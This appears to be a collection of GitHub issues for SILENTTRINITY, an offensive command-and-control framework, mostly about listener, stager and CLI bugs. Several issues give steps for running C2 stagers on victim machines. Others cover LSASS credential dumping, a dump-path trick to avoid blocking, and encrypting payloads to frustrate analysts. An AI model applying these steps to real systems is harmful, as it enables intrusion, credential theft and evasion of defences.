C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.MethodBase.Invoke(Object
 obj, Object[] parameters)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à InlineCode.ST.Execute() dans c:\Users\bonc
lay\AppData\Local\Temp\cqxgsizt.0.cs:ligne 63\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à Microsoft.Build.BackEnd.TaskExecutionHost.
Microsoft.Build.BackEnd.ITaskExecutionHost.Execute()\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à Microsoft.Build.BackEnd.TaskBuilder.<Execu
teInstantiatedTask>d__26.MoveNext()

Sessions run modules/tasks asynchronously, the way this is currently implemented (threads) has the unfortunate consequence of mixing up module's output if more than one is running at the same time because we're just hooking STDout using Console.SetOutput(). (https://github.com/byt3bl33d3r/SILENTTRINITY/blob/master/core/teamserver/data/stage.boo#L359-L379)

We really have only two options (unless i'm missing something obvious) to fix this:

1. We run each module in it's own separate process instead of a thread (which would allow us to keep using the print statement for a modules output but would complicate the code considerably )
2. Pass a new StringBuilder() object to each module and append the output to it (this would allow us to keep using threads but we won't be able to use the print statement anymore to handle output which is really pretty)

Backslashes are currently not handled by the CLI so specifying windows paths is a PITA to say the least, needs to be dealt with to preserve my sanity.

Add an interactive shell module, that essentially drops you into a windows like shell (instead of having to set the 'command' option in the cmd module.

Alternatively (or in addition), add the ability to control the beacon timing (such that I can set it to 1, and get almost immediate responses).

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb

• SILENTTRINITY Version: Latest master branch
• OS running the Client: Ubuntu 18.04 x64
• Python Version Running the Client: Python 3.7.4+
• OS running the TeamServer: Ubuntu 18.04 x64 (same system as client)
• Python version running the Teamserver: Python 3.7.4 (same system as client)

Expected Behavior

Either as BindIP is set, or before saying the server has been started with the start command, I'd expect ST to validate that the BindIP given is one that can be bound.

Current Behavior

Currently there's no feedback given about improper BindIP options in the client:

Failure Information

[1] ST (listeners)(http) ≫ options                                                                                                                                                                                 
┌Listener Options─────────┬───────────────────────────┬───────────────────────────────────────────────┐
│ Option Name  │ Required │ Value                     │ Description                                   │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Name         │ True     │ http                      │ Name for the listener.                        │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ BindIP       │ True     │ 192.168.252.192.168.252.1 │ The IPv4/IPv6 address to bind to.             │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Port         │ True     │ 80                        │ Port for the listener.                        │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ CallBackURls │ False    │                           │ Additional C2 Callback URLs (comma seperated) │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Comms        │ True     │ http                      │ C2 Comms to use                               │
└──────────────┴──────────┴───────────────────────────┴───────────────────────────────────────────────┘

The stager does give the following errors:

From PowerShell stager:

[*] Attempting HTTP POST to http://192.168.252.192.168.252.1/705213ab-e9e7-4f0d-8942-5b61719af2f4
[-] Attempt #1
        [!] The remote name could not be resolved: '192.168.252.192.168.252.1'
[-] Attempt #2
        [!] The remote name could not be resolved: '192.168.252.192.168.252.1'

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

1. Start listener and ST client as normal
2. Create a new listener with an invalid IP (like 1.2.3.4.5.6, which is not how IPv6 works) set to BindIP
3. Start the listener with the start command

Failure Logs

I think I've given all the relevant logs in Failure Information, but I can provide more information if needed.

Will the Wiki updated? How can I submit pages to the Wiki? Example: https://github.com/davidtavarez/SILENTTRINITY/wiki/Generating-stagers

Hi, I'd like to report what I think could be a bug and a couple of suggestions (non feature requests, I know PR is the right path for that). Thanks in advance.

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

• SILENTTRINITY Version: Zuiikin 0.4.0dev
• OS running the Client: BlackArch (not relevant, same result on Parrot Linux)
• Python Version Running the Client 3.7.4
• OS running the TeamServer: BlackArch (not relevant, same result on Parrot Linux)
• Python version running the Teamserver: 3.7.4

Expected Behavior

1. Receive a stager once the .exe file is run under windows (AV is off). It was working yesterday and is failing today, so it seems some kind of bug.

2. Another expected behavior is to launch a "sessions" command without seeing any error even without any active session.

Current Behavior

1. Just a timeout. It worked for me yesterday, but after doing git pull with the commits done today is not working anymore. Is hard to say you which exactly version due the messy versioning method. As a suggestion I could say that commits to master shouldn't be allowed (the branch can be protected on github) and after some commits on a a dev branch, a PR to master could be done and tagged as a new version. In this way is easier for you and for users to track what is happening and when. A CHANGELOG.md file could also help here. The sha1 of the commit on which I'm testing is b43044f2a343ff497ea9d1c931401a6523074904

2. On the screenshot you can see (upper-left) an error shown on teamserver console after launching a simple "sessions" command while there is no any active session.

Failure Information

1. Check the screenshot. The cmd windows command is showing a "Timeout". Of course, the windows (victim) and the attacker (Linux with teamserver and c&c client) are in a local LAN with full network visibility between them.

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

1. After installing, pipenv, etc etc... Launch the teamserver python3 teamserver.py 192.168.0.161 xxxxxxx
2. Connect client c&c to teamserver python3 st.py wss://elvis:[email protected]:5000
3. Set up a listener: listeners, use https, options, start https
4. Set up a stager: stagers, use exe, generate https
5. Copy stager.exe to windows victim machine
6. Get the right guid and psk from sqlite db on the teamserver
7. Execute the stager: stager.exe 206e3d7a-8df6-4c73-bdb7-9a6cd38ce24e 84e8b494da44aa861e11cc67d35dde9fa92230698d015c1eb67b40e6d2ae5f2b https://192.168.0.161
   ...

Failure Logs

As a final suggestion I can say that after creating the .exe stager... is hard to know what is the guid and the psk. As you can see in the screenshot (bottom-right) I opened the sqlite db to get the right values. It could be nice to print on client c&c screen the right values once the stager is created to avoid that manual searching of the right values.

Thanks! this tool seems promising!

flake8 testing of https://github.com/byt3bl33d3r/SILENTTRINITY on Python 3.7.0

$ flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics

./Server/modules/src/mimikatz.py:37:49: E999 SyntaxError: invalid syntax
    print "[+] Running in high integrity process"
                                                ^
./Server/modules/src/excelshellinject.py:11:39: E999 SyntaxError: invalid syntax
print "[*] Excel Version installed: {}".format(app_version)
                                      ^
./Server/modules/src/msgbox.py:7:14: E999 SyntaxError: invalid syntax
print 'Popped'
             ^
./Server/modules/src/powershell.py:31:23: E999 SyntaxError: invalid syntax
print PowerShellExecute("COMMAND_TO_RUN")
                      ^
./Server/modules/src/safetykatz.py:39:49: E999 SyntaxError: invalid syntax
    print "[+] Running in high integrity process"
                                                ^
./Server/modules/src/shell.py:9:45: E999 SyntaxError: invalid syntax
    print "[*] Path: {} Command: {} Args: {}".format(Path, ShellCommandName, ShellCommandArguments)
                                            ^
./Server/modules/src/msilshellexec.py:267:21: E999 SyntaxError: invalid syntax
print "[*] Type : {}".format(type(assembly))
                    ^
./Server/modules/src/execute-assembly.py:22:22: E999 SyntaxError: invalid syntax
        print Encoding.UTF8.GetString(buffer, 0, buffer.Length)
                     ^
./Server/data/stage.py:162:46: E999 SyntaxError: invalid syntax
        if DEBUG: print "Running job (id: {})".format(job['id'])
                                             ^
9     E999 SyntaxError: invalid syntax
9

It seems ST is unforgiving and particular when it comes to special characters in the shell module command option. For instance in order to successfully get a directory listing of C:\ Your command must be "dir C:\\" or it won't work. Furthermore, I have yet figured out how to handle spaces, so I can list the contents of something like "C:\Program Files" (I tried escaping the space with a backslash, two backslashes, quotation marks around the whole thing, escaping those quotation marks, etc etc).

Ultimately it would be nice if the end user didn't have to figure out proper escaping. For instance;

set Command dir "C:\Program Files"

If thats not possible, due to how you are processing module parameters, then maybe the next best thing is to include proper escaping techniques in the "Command" option description (listed when you type "options".

Context

• SILENTTRINITY Version: 0.1.0dev
• Operating System: Kali 2019.2
• Python Version: Python 3.7.3rc1

ST Setup & resulting behavior

HTTPS Listener on 8080
MSBuild stager executed on Windows Server 2016 client
Module = ipy/shell

Holla at you dudettes,

First of all, big thank you for your great work on the readme.md - helped me to understand all of this in a couple of minutes.

I got a feature-request on the zip-file exchaning:
In my opinion it would make sense, that the zip-blob is being encrypted server-sidely before sending it to the C#-agent.
If the ZIP-file is fetched by a sandbox or by an analyst, it is useless without the key, which is maybe implemented in the binary.

Hope i can contribute to this project in the near future 👍

Context

Setup:

• SILENTTRINITY Version: 0.3.0dev
• OS running the Client: kali 4.19.0-kali3-amd64
• Python Version Running the Client: Python 3.7.3rc1
• OS running the TeamServer: kali 4.19.0-kali3-amd64
• Python version running the Teamserver: Python 3.7.3rc1

Expected Behavior

The listener should open the port configured in the "listerners/http" set up.

Current Behavior

After setting up the listener and started it doesn't open the port and the target host cannot reach the listener handler

Failure Information

Starting the listener (Debug info from the teamserver):

2019-08-17 16:38:02,073 3296 MainThread - [DEBUG] protocol.py: write_frame - server > 
Frame(fin=True, opcode=1, data=b'{"type": "message",
"id": "wfH3LrCwSx",
"ctx": "listeners",
"name": "list",
"status": "success",
"result": {"http": {"name": "http",
"author": "@byt3bl33d3r",
"description": "HTTP listener",
"running": true,
"options": {"Name": {"Description": "Name for the listener.",
"Required": true,
"Value": "listen_http"},
"BindIP": {"Description": "The IPv4/IPv6 address to bind to.",
"Required": true,
"Value": "10.0.2.15"},
"Port": {"Description": "Port for the listener.",
"Required": true,
"Value": "8123"},
"Comms": {"Description": "C2 Comms to use",
"Required": true,
"Value": "http"}}}}}', rsv1=False, rsv2=False, rsv3=False)

Stopping the listener (Debug info from the teamserver):

2019-08-17 16:39:40,705 3296 MainThread - [DEBUG] protocol.py: write_frame - server > 
Frame(fin=True, opcode=1, data=b'{"type": "message",
"id": "RyPmvQyfgV",
"ctx": "listeners",
"name": "stop",
"status": "success",
"result": null}', rsv1=False, rsv2=False, rsv3=False)

Steps to Reproduce

1. python3 st.py wss://username:[email protected]:5000
2. listeners
3. use http
4. set Port 8123
5. start
6. list

Failure Logs

Starting the teamserver:

Starting the client:

Thx, awesome project

I set up Silent Trinity on Kali and retrieved all the requirements with pip. Launched st.py with python3 successfully.

Set up a listener and a stager using msbuild. Transferred the msbuild.xml to target box and launched it with MSbuild.exe

I get the error:

Error downloading https:///stage.zip: The underlying connection was closed: An unexpected error occurred on a send.

It seems not to be able to get the stager and the Windows box is in the same network as the listener box.

Do you think you might be able to use COM interop to open the ZIP file using the "Shell.Application" COM interface?

Just a suggestion.

Hello @byt3bl33d3r,
It would be cool if all the actions and results could be logged, just like the spool command with metasploit.

Cheers dude !

EDIT : I see that this feature is already possible but not enabled, a user option is more than welcome

Is it possible to add a local / remote port forwarding feature ?

This came up in #54, keeping the binaries updated for every module is a hassle and too much work. @maaaaz mentioned that an alias command for the execute-assembly module might do the trick and i think this is probably the best solution. If anyone has a better idea i'm all ears.

Context

• SILENTTRINITY Version: 0.1.0dev
• Operating System: Kali 2019.2
• Python Version: Python 3.7.3rc1

ST Setup & resulting behavior

HTTPS Listener on 8080
MSBuild stager executed on Windows Server 2016 client, under the context of a domain user in the local administrators group
Module = ipy/mimikatz
run all

Output:

[+] f83a38c9-14fe-44ad-870f-2d70fc3e24e7 returned job result (id: LJpKMPve)
[-] Not in high integrity process

Expected Behavior

ST Should attempt to elevate privileges to system, before running the Mimikatz and/or any LSASS related modules. Alternatively create a separate module (such as MSF 'get system') which would achieve this purpose.

Current Behavior

Even if the session is running under the context of a user in the administrators group, LSASS modules, fail to execute (dump memory).

Hey byt3bl33d3r,

big fan of your work,

I notice in /module/src/safetykatz.py

the output folder destination " {0}\Temp\debug.bin "got block by default on my windows10

i change it to :
dumpFile = "{0}\system32\spool\drivers\color\debug.bin".format(systemRoot)

And it work , continue the good work !!

I installed .NET core the other day on MacOS and it seems to be pretty straight forward. Plus there seems to be packages for it for almost every *nix os that I'd ever use (including Arch!).